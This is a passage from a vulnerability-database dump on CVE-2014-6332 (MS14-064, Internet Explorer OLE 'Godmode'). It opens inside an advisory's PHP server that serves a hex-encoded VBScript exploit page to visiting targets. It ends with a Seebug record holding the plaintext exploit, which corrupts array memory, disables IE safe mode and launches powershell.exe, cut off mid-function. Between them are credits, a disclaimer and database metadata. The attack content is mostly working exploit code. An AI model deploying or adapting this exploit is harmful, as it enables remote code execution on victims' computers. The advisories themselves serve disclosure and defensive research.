"\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69".\r\n "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e".\r\n "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d".\r\n "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69".\r\n "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f".\r\n "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a".\r\n "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33".\r\n "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e".\r\n "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66".\r\n "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45".\r\n "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20".\r\n "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72".\r\n "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76".\r\n "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43".\r\n "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20".\r\n "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74".\r\n "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74".\r\n "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e".\r\n "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45".\r\n "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69".\r\n "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32".\r\n "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30".\r\n "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d".\r\n "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61".\r\n "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34".\r\n "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61".\r\n "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".\r\n "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75".\r\n "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20".\r\n "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e".\r\n "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20".\r\n "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28".\r\n "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20".\r\n "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20".\r\n "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d".\r\n "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b".\r\n "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64".\r\n "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28".\r\n "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".\r\n "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68".\r\n "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37".\r\n "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75".\r\n "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d".\r\n "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20".\r\n "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20".\r\n "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33".\r\n "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30".\r\n "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20".\r\n "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20".\r\n "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30".\r\n "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20".\r\n "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65".\r\n "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74".\r\n "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34".\r\n "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38".\r\n "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28".\r\n "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d".\r\n "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29".\r\n "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69".\r\n "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61".\r\n "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28".\r\n "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29".\r\n "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66".\r\n "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20".\r\n "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d".\r\n "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74".\r\n "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65".\r\n "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20".\r\n "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69".\r\n "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20".\r\n "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46".\r\n "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28".\r\n "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20".\r\n "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65".\r\n "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49".\r\n "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72".\r\n "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a".\r\n "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65".\r\n "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45".\r\n "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".\r\n "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f".\r\n "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65".\r\n "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".\r\n "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29".\r\n "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20".\r\n "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36".\r\n "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64".\r\n "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64".\r\n "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d".\r\n "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e";\r\n $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);\r\n \r\n for (;;) {\r\n if ($client = @socket_accept($reza)) {\r\n socket_write($client, "HTTP/1.1 200 OK\r\n" .\r\n "Content-length: " . strlen($msgd) . "\r\n" .\r\n "Content-Type: text/html; charset=UTF-8\r\n\r\n" .\r\n $msgd);\r\n print "\n Target Checked Your Link \n";\r\n }\r\n else usleep(100000);\r\n }\r\n \r\n \r\n ?>\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the security vulnerability in the html hta application is estimated as high. (CVSS 9.3)\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nAuthor: Mohammad Reza Espargham\r\nLinkedin: https://ir.linkedin.com/in/rezasp\r\nE-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com\r\nWebsite: www.reza.es\r\nTwitter: https://twitter.com/rezesp\r\nFaceBook: https://www.facebook.com/mohammadreza.espargham\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either \r\nexpressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers \r\nare not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even \r\nif Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation \r\nof liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break \r\nany vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: dev.vulnerability-db.com\t \t- forum.vulnerability-db.com \t\t \t\t- magazine.vulnerability-db.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2014 | Vulnerability Laboratory [Evolution Security]\r\n\r\n\r\n\r\n-- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-08-24T00:00:00", "title": "Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32398", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32398", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:46", "description": "Information leakage, multiple use-after-free vulnerabilities", "edition": 2, "cvss3": {}, "published": "2013-05-27T00:00:00", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-1307", "CVE-2013-1311", "CVE-2013-1308", "CVE-2013-0811", "CVE-2013-3140", "CVE-2013-2551", "CVE-2013-1347", "CVE-2013-1309", "CVE-2013-1306", "CVE-2013-1312", "CVE-2013-1297", "CVE-2013-1310"], "modified": "2013-05-27T00:00:00", "id": "SECURITYVULNS:VULN:13082", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13082", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:45", "description": "OLE code execution, Internet Explorer multiple vulnerabilities, Schannel code execution, XML Core Services code execution, TCP/IP privilege escalation, Windows Audio Service privilege escalation, .NET Framework privilege escalation, RDP restrictions bypass, IIS restrictions bypass, IME privilege escalation, kernel-mode drivers DoS.", "edition": 2, "cvss3": {}, "published": "2015-08-24T00:00:00", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6337", "CVE-2014-6343", "CVE-2014-4143", "CVE-2014-4077", "CVE-2014-6350", "CVE-2014-6344", "CVE-2014-6332", "CVE-2014-6322", "CVE-2014-6341", "CVE-2014-6348", "CVE-2014-4076", "CVE-2014-6349", "CVE-2014-6351", "CVE-2014-6318", "CVE-2014-6323", "CVE-2014-6339", "CVE-2014-6345", "CVE-2014-6352", "CVE-2014-6342", "CVE-2014-6340", "CVE-2014-6347", "CVE-2014-4149", "CVE-2014-4118", "CVE-2014-6346", "CVE-2014-6317", "CVE-2014-6321", "CVE-2014-6353"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:VULN:14090", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14090", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:45:53", "description": "No description provided by source.", "cvss3": {}, "published": "2013-03-20T00:00:00", "title": "Microsoft Internet Explorer \u4e0d\u660e\u7ec6\u8282\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-2551)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-03-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60700", "id": "SSV:60700", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:01:24", "description": "No description provided by source.", "cvss3": {}, "published": "2017-03-06T00:00:00", "type": "seebug", "title": "IE Godmode remote code execution vulnerability, CVE-2014-6332\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2017-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92734", "id": "SSV:92734", "sourceData": "\n alliedve.htm\r\n//*\r\n allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.\r\n cve-2014-6332 exploit\r\n https://twitter.com/yuange75\r\n http://hi.baidu.com/yuange1975\r\n \r\n*//\r\n\r\n\r\n<!doctype html>\r\n<html>\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE8\" >\r\n<head>\r\n</head>\r\n<body>\r\n\r\n<SCRIPT LANGUAGE=\"VBScript\">\r\nfunction runmumaa() \r\nOn Error Resume Next\r\nset shell=createobject(\"Shell.Application\")\r\nshell.ShellExecute \"powershell.exe\"\r\nend function\r\n</script>\r\n<SCRIPT LANGUAGE=\"VBScript\">\r\n \r\ndim aa()\r\ndim ab()\r\ndim a0\r\ndim a1\r\ndim a2\r\ndim a3\r\ndim win9x\r\ndim intVersion\r\ndim rnda\r\ndim funclass\r\ndim myarray\r\nBegin()\r\nfunction Begin()\r\n On Error Resume Next\r\n info=Navigator.UserAgent\r\n if(instr(info,\"Win64\")>0) then\r\n exit function\r\n end if\r\n if (instr(info,\"MSIE\")>0) then \r\n intVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \r\n else\r\n exit function \r\n \r\n end if\r\n win9x=0\r\n BeginInit()\r\n If Create()=True Then\r\n myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)\r\n myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)\r\n if(intVersion<4) then\r\n document.write(\"<br> IE\")\r\n document.write(intVersion)\r\n runshellcode() \r\n else \r\n setnotsafemode()\r\n end if\r\n end if\r\nend function\r\nfunction BeginInit()\r\n Randomize()\r\n redim aa(5)\r\n redim ab(5)\r\n a0=13+17*rnd(6)\r\n a3=7+3*rnd(5)\r\nend function\r\nfunction Create()\r\n On Error Resume Next\r\n dim i\r\n Create=False\r\n For i = 0 To 400\r\n If Over()=True Then\r\n ' document.write(i) \r\n Create=True\r\n Exit For\r\n End If \r\n Next\r\nend function\r\nsub testaa()\r\nend sub\r\nfunction mydata()\r\n On Error Resume Next\r\n i=testaa\r\n i=null\r\n redim Preserve aa(a2) \r\n \r\n ab(0)=0\r\n aa(a1)=i\r\n ab(0)=6.36598737437801E-314\r\n aa(a1+2)=myarray\r\n ab(2)=1.74088534731324E-310 \r\n mydata=aa(a1)\r\n redim Preserve aa(a0) \r\nend function \r\nfunction setnotsafemode()\r\n On Error Resume Next\r\n i=mydata() \r\n i=readmemo(i+8)\r\n 